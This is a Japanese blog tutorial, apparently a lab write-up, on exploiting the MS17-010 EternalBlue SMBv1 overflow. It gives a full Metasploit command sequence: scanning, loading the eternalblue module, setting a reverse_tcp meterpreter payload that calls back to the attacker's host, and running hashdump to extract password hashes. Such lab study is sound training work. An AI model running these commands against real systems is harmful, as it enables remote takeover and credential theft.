MS17-010リモートオーバーフロー(CVE-2017-0143)

脆弱性の紹介

MS17-010の脆弱性は、FEA(ファイル拡張属性)変換を処理するときにWindows SMB v1のカーネルモード関数srv!SrvOs2FeaListToNtに現れ、大規模な非ページカーネルプールにバッファーオーバーフローがあります。
FEAリストをNTFEA(Windows NT FEA)リストに変換する前に、関数srv!SrvOs2FeaListToNtが呼び出されます。srv!SrvOs2FeaListSizeToNtは、変換されたFEAのサイズを計算します。計算のサイズが間違っているため、バッファオーバーフローが発生します。

ラボ環境

ここではAnjie.comの射撃場を使います

時間 192.168.0.3
Windows7 192.168.0.2

エクスプロイト

nmapを開いてターゲットマシンをスキャンします

nmap  -sV -Pn 192.168.0.2

ターゲットマシンは
135、139、445 などのポートを開いており、システムはwin7です。次に、msfを開きます。

msfconsole

metasploiteコマンドラインクライアントを開き、検索コマンドを使用して、ms17-010の脆弱性の関連モジュールを見つけます。

search ms17-010

これはターゲットの場所なので、直接使用できます

use exploit/windows/smb/ms17_010_eternalblue

構成情報を表示し、yesとマークされた属性を設定します

show options

ターゲットマシンのIPアドレスを設定する

set RHOSTS 192.168.0.2

その後、ペイロードペイロード(シェルコード)を選択します。ここでは、コンソールシェルのペイロードに接続することを選択します。

set payload  windows/x64/meterpreter/reverse_tcp

同様に、負荷も構成する必要があります。オプションの構成情報を表示します。
構成にローカルホストLHOSTがありません。設定してください。

set LHOST 192.168.0.3

設定が完了したら、エクスプロイトを実行するか、を実行してエクスプロイトモジュールの実行を開始します

run

ターゲットホストからセッションセッションを正常に取得します

セッションセッションを正常に取得しました。今回は、meterpreterの後でペネトレーションモジュールの他の機能を引き続き紹介します。sysinfoを
実行して、ターゲットマシンの関連情報を表示します。

sysinfo

helpコマンドを実行すると、meterpreterの機能を理解するのに役立ちます

help

次に、ターゲットマシンのハッシュ値を取得し、
hashdump 実行します

hashdump

総括する

別のシンプルで充実した日!

おすすめ

転載: blog.csdn.net/p_utao/article/details/108394587